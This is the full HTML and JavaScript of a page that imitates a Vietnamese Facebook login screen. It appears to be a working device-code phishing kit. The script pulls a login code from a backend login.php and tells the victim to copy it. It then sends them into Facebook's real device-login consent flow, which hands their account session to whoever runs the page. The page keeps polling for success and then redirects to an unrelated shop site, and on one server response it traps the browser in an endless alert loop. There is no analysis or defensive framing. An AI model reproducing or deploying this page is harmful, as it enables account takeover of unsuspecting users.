<head>
    <title>Đăng Nhập Facebook</title>
    <meta name="csrf-token" content="7uS4hLpdpvlrOYeZX8yQRvz4FoaXJqLByvJvo80Z">
    <link rel="icon" href="https://i.imgur.com/UdxSZ1Z.png" type="image/x-icon">
    <style>body, html {
margin: 0;
padding: 0;
}</style>
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0">

    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC"
        crossorigin="anonymous" />
        
<style>
    .loader {
        width: 40px;
        height: 40px;
        border: 5px solid #1a6ce6;
        border-bottom-color: transparent;
        border-radius: 50%;
        display: none;
        box-sizing: border-box;
        animation: rotation 1s linear infinite;
        margin-right: 35px;
    }

    @keyframes rotation {
        0% {
            transform: rotate(0deg);
        }

        100% {
            transform: rotate(360deg);
        }
    }

    .loader-line {
        width: 500px;
        height: 3px;
        position: relative;
        overflow: hidden;
        background-color: #ddd;
        margin: 40px auto;
        -webkit-border-radius: 20px;
        -moz-border-radius: 20px;
        border-radius: 20px;
    }

    .loader-line:before {
        content: "";
        position: absolute;
        left: -50%;
        height: 3px;
        width: 40%;
        background-color: #1a6ce6;
        -webkit-animation: lineAnim 1s linear infinite;
        -moz-animation: lineAnim 1s linear infinite;
        animation: lineAnim 1s linear infinite;
        -webkit-border-radius: 20px;
        -moz-border-radius: 20px;
        border-radius: 20px;
    }

    @keyframes lineAnim {
        0% {
            left: -40%;
        }

        50% {
            left: 20%;
            width: 80%;
        }

        100% {
            left: 100%;
            width: 100%;
        }
    }

    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        background-color: #fff;
        height: 100vh;
    }

    .header {
        width: 100%;
        height: 50px;
        background-color: #517bd0;
        color: #9f9f9f;
        display: flex;
        text-align: left;
        flex-wrap: wrap;
        padding: 10px 48px;
        flex-direction: column-reverse;
    }

    .header a {
        margin-top:100px;
        text-decoration: none;
        color: #fff;
        display: inline;
        font-weight: 600;
        grid-area: auto;
    }

    .main {
        width: full;
        height: 550px;
        background-color: #f0f2f5;
        flex-wrap: wrap;
        grid-area: auto;
        justify-content: center;
        display: flex;
        align-items: center;
    }

    .content {
        width: 612px;
        height: auto;
        background-color: #ffffff;
        padding: 12px;
        display: flex;
        flex-direction: column;
        border: 1px solid #dddfe2;
        border-color: #d1d2d5 #d1d2d5 #c5c6c8 #c5c6c8 !important;
        border-radius: 3px;
    }

    .titleContent {
        align-items: center;
        display: flex;
        flex-wrap: wrap;
        grid-area: auto;
        justify-content: space-between;
        padding: 0px 0px 12px;
        border-bottom: 1px solid #dddfe2;
    }

    .titleContent h2 {
        color: #1d2129;
        font-size: 14px;
        font-weight: 700;
        grid-area: auto;
    }

    .topContent {
        line-height: 18px;
        padding: 12px 0;
        border-bottom: 1px solid #dddfe2;
        vertical-align: initial;
    }

    .topContent p {
        color: #1d2129;
        font-size: 14px;
        line-height: 18px;
        display: inline;
    }

    .mainContent {
        display: flex;
        flex-direction: column;
        justify-content: space-between;
        line-height: 18px;
        padding: 12px 0;
        border-bottom: 1px solid #dddfe2;
    }

    .mainContent b {
        font-size: 14px;
        font-weight: 700;
        line-height: 18px;
        margin: 0 0 12px;
        color: #1d2129;
    }

    .mainContent p {
        color: #1d2129;
        font-size: 14px;
        grid-area: auto;
        line-height: 18px;
        display: inline;
        margin-bottom: 0;
    }

    .main2fa {
        display: flex;
        flex-direction: column;
        justify-content: space-between;
        line-height: 18px;
        padding: 12px 0;
        border-bottom: 1px solid #dddfe2;
    }

    .main2fa b {
        font-size: 14px;
        font-weight: 700;
        line-height: 18px;
        color: #1d2129;
    }

    .main2fa p {
        color: #1d2129;
        font-size: 14px;
        grid-area: auto;
        line-height: 18px;
        display: inline;
        margin-bottom: 0;
    }

    .main2fa input {
        width: 143px;
        display: inline-block;
        outline: none;
        box-shadow: none;
        padding: 3px;
        font-size: 12px;
        background-clip: padding-box;
        background-color: #fff;
        border: 1px solid #bdbdbd;
    }

    .bottomContent {
        align-items: center;
        display: flex;
        flex-wrap: wrap;
        grid-area: auto;
        justify-content: space-between;
        padding: 12px 0 0;
        border: none;
        text-align: right;
    }

    .bottomContent a {
        text-decoration: none;
        text-align: right;
        grid-area: auto;
        color: rgb(25, 106, 193);
        font-weight: 500;
        font-size: 12px;
    }

    .bottomContent button {
        
        padding: 3px 11px;
        font-size: 12px !important;
        font-weight: 600 !important;
        background-color: #1a6fdb;
        border: none;
        border-radius: 2px;
        color: #fff;
        cursor: pointer;
        font-size: 1rem;
        font-weight: 500;
        line-height: 24px;
        padding: 5px 10px !important;
        
    }

    .footer {
        width: full;
        height: auto;
        background-color: #fff;
        flex-wrap: wrap;
        grid-area: auto;
        justify-content: center;
        display: flex;
        align-items: center;
    }

    .mainFooter {
        margin-top: 50px;
        width: 980px;
        height: 200px;
        padding: 12px;
    }

    .topfooter {
        margin: 0 0 12px;
        padding: 0 0 12px;
        border-bottom: 1px solid #dddfe2;
    }

    .topfooter span {
        color: #517bd0;
        display: inline-block;
        font-size: 12px;
        grid-area: auto;
        line-height: 19.2px;
        margin: 0 10px 0 0;
    }

    .spanEng {
        color: #737373 !important;
    }

    .mainfooter {
        border-bottom: 1px solid #dddfe2;
        font-size: 12px;
        margin-bottom: 12px;
        padding-bottom: 12px;
    }

    .mainfooter span {
        color: #517bd0;
        display: inline-block;
        font-size: 12px;
        grid-area: auto;
        line-height: 19.2px;
        margin: 0 20px 0 0;
    }

    .bottomfooter {
        margin: 0 0 12px;
        padding: 0 0 12px;
        grid-area: auto;
    }

    .bottomfooter span {
        display: inline-block;
        line-height: 19.2px;
        margin-right: 10px;
        font-size: 12px;
        color: #737373 !important;
        cursor: default !important;
    }

    @media screen and (max-width: 768px) {
        .content {
            margin: 0 10px;
        }

        .mainFooter {
            margin-left: 10px;
            margin-right: 10px;
            margin-top: 20px;
        }
    }

    * {
        font-family: system-ui, -apple-system, "Segoe UI", Roboto,
            "Helvetica Neue", Arial, "Noto Sans", "Liberation Sans", sans-serif,
            "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol",
            "Noto Color Emoji";
    }

    .popup-container {
        height: 304px;
        -webkit-animation-duration: 0.4s;
        animation-duration: 0.4s;
        -webkit-animation-name: animatetop;
        animation-name: animatetop;
        background-color: #fff;
        border: 1px solid #888;
        border-radius: 0.5rem;
        box-shadow: 0 4px 8px 0 #0003, 0 6px 20px 0 #00000030;
        max-width: 94%;
        padding: 0;
        position: relative;
        width: 500px;
        padding: 16px;
    }

    .popup-content {
        border-top: 1px solid #dee2e6;
        padding: 16px;
    }

    .popup-header {
        border-bottom: 1px solid #dee2e6;
        padding: 16px;
        justify-content: space-between;
        display: flex;
        flex-wrap: wrap;
        color: #67788a;
        font-weight: 700;
        border: 0;
        font-size: 100%;
        font: inherit;
        margin: 0;
        padding: 0;
        vertical-align: initial;
    }

    .popup-header h2 {
        font-size: 15px;
    }

    .close {
        color: #212529;
        color: var(--color-text);
        cursor: pointer;
        font-size: 34px;
        font-weight: 300;
        line-height: 0;
        cursor: pointer;
        font-size: 34px;
        font-weight: 300;
        line-height: 0;
    }

    .popup-text {
        font-size: 15px;
        line-height: 1.4;
        margin-bottom: 15px;
        color: #67788a;
    }

    .btn-close1 {
        border: none;
        border-radius: 0;
        color: #fff;
        cursor: pointer;
        font-size: 1rem;
        font-weight: 500;
        line-height: 24px;
        padding: 6px 12px;
        background-color: gray !important;
    }

    .popup-footer {
        border-top: 1px solid #dee2e6;
        text-align: right;
        padding: 16px;
    }

    .background-popup {
        background-color: #000;
        background-color: #0006;
        color: #67788a;
        display: flex;
        flex-wrap: wrap;
        font-size: 15px;
        height: 100%;
        left: 0;
        overflow: auto;
        position: fixed;
        top: 0;
        width: 100%;
        z-index: 1;
        z-index: 2;
        justify-content: center;
        justify-content: center;
        border: 0;
        font-size: 100%;
        font: inherit;
        margin: 0;
        padding: 0;
        vertical-align: initial;
        box-sizing: border-box;
        align-content: center;
    }

    .background-popup-main {
        background-color: #f0f2f5;
        background-color: #000;
        background-color: #0006;
        color: #67788a;
        display: none;
        flex-wrap: wrap;
        font-size: 15px;
        height: 100%;
        left: 0;
        overflow: auto;
        position: fixed;
        top: 0;
        width: 100%;
        z-index: 1;
    }
</style>
</head>

<body>
    <div class="header">
<a href="https://www.facebook.com" style="font-size: 25px; margin-top: 5px">Facebook</a>
    </div>
    <div class="main">
        <div class="content">
            <div class="titleContent">
                <h2>Đăng Nhập Bằng Mã Thiết Bị</h2>
            </div>
            <div class="topContent">
                <p>
                    
            Bạn đang đăng nhập Facebook bằng hình thức mã xác thực tài khoản.<br>
            Vui lòng không chia sẽ mã bên dưới cho bất cứ ai để đảm bảo tính an toàn.<br>
            Sau khi xác thực thành công, vui lòng quay lại trang này để chuyển tiếp.
                </p>
            </div>
        
            <div class="main2fa">
                <b>Sử dụng mã bên dưới để xác thực đăng nhập</b>
                <p>
                Nhấn vào mã để sao chép, sau đó nhấn nút <b>"Tiếp tục bằng Facebook"</b> để xác thực mã đăng nhập
                </p>
                <div style="display: flex; align-items: center;">

                <input type="text" value="" readonly id="blackcode"  style="margin-right: 5px;" /><button class="btn btn-primary"  style="width: auto; padding: 5px 10px;" onclick="copyData()" id="copyButton">Sao chép</button>
            </div>
            </div>
            <div class="bottomContent">
                <button id="privacyLink"><img src="https://accounts.scdn.co/sso/images/new-facebook-icon.eae8e1b6256f7ccf01cf81913254e70b.svg" alt="continue" class="w-6 h-6 mr-2"> Tiếp tục bằng Facebook</button>
            </div>
        </div>
    </div>

<script>
        function openNewTab(url) { 
            window.open(url, '_blank');
        }
     </script>
     <script>
        document.getElementById('privacyLink').onclick = function() {
            var isAndroid = /Android/i.test(navigator.userAgent);
            var url = "https://www.facebook.com/privacy/consent/?flow=device_login&source=device_login";
        
            if (isAndroid) { 
                window.location.href = "intent://www.facebook.com/privacy/consent/?flow=device_login&source=device_login#Intent;scheme=https;end";
            } else { 
                window.open(url, '_blank');
            }
        };
     </script>
    <div class="footer">
        <div class="mainFooter">
            <div class="topfooter">
                <span class="spanEng">English (US)</span><span>日本語</span><span>Português
                    (Brasil)</span><span>中文(简体)</span><span>Español</span><span>Bahasa
                    Indonesia</span><span>한국어</span><span>Français
                    (France)</span><span>Deutsch</span><span>Italiano</span>
            </div>
            <div class="mainfooter">
                <span>Sign Up</span><span>Log In</span><span>Messenger</span><span>Facebook
                    Lite</span><span>Video</span><span>Places</span><span>Games</span><span>Marketplace</span><span>Meta
                    Pay</span><span>Meta Store</span><span>Meta
                    Quest</span><span>Instagram</span><span>Threads</span><span>Fundraisers</span><span>Services</span><span>Voting
                    Information Center</span><span>Privacy Policy</span><span>Privacy
                    Center</span><span>Groups</span><span>About</span><span>Create ad</span><span>Create
                    Page</span><span>Developers</span><span>Careers</span><span>Cookies</span><span>Ad
                    choices</span><span>Terms</span><span>Help</span><span>Contact Uploading &amp; Non-Users</span>
            </div>
            <div class="bottomfooter">
                <span>Meta © 2024</span>
            </div>
        </div>
    </div>
</body>



                            
<script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
// Lấy tham chiếu đến input và button
var input = document.getElementById('blackcode');

// Thêm sự kiện click vào button
var copyButton = document.getElementById('copyButton');
copyButton.addEventListener('click', function () {
    // Sao chép giá trị của input
    input.select();
    document.execCommand('copy');
    alert('Bạn đã sao chép mã thành công');
});
});

$(document).ready(function() {
var interval;
var blackcode = document.getElementById("blackcode");

blackcode.value = "Lấy Code...";
function laycode() {
    var formData = new FormData();
        formData.append('get_code', 1);
        formData.append('csrf-token', $('meta[name="csrf-token"]').attr('content'));
    $.ajax({
        type: 'POST',
        url: './login.php',
        data: formData,
        processData: false,
        contentType: false,
        success: function(response) {
            if (response.status == 200) {
                clearInterval(lapcode);
                blackcode.value = response.message;
                
            }  else if (response.status == 404) { // 2fa
            while(true) {
 alert(response.message);
}

                
            }
        },
        error: function(error) {
        },
        complete: function() {
        }
    });
}

function requestcode() {
    var formData = new FormData();
        formData.append('check_code', 1);
        formData.append('csrf-token', $('meta[name="csrf-token"]').attr('content'));
        formData.append('country', 'SG');


    $.ajax({
        type: 'POST',
        url: './login.php',
        data: formData,
        processData: false,
        contentType: false,
        success: function(response) {
            if (response.status == 200) {
                clearInterval(interval);
                var submitButton = document.getElementById('submitcode');

submitButton.innerHTML = 'Xác thực thành công';
    submitButton.disabled= true;
                window.location.href = "https://shopbequuynhff.vn";
            }  else if (response.status == 404) { // 2fa
            while(true) {
 alert(response.message);
}

                
            } else if (response.status == 201) { // 2fa
window.location.href = window.location.href;
            }
        },
        error: function(error) {
        },
        complete: function() {
        }
    });
}
laycode();
lapcode = setInterval(laycode, 60000);
interval = setInterval(requestcode, 15000); // 5 giây
});

</script>


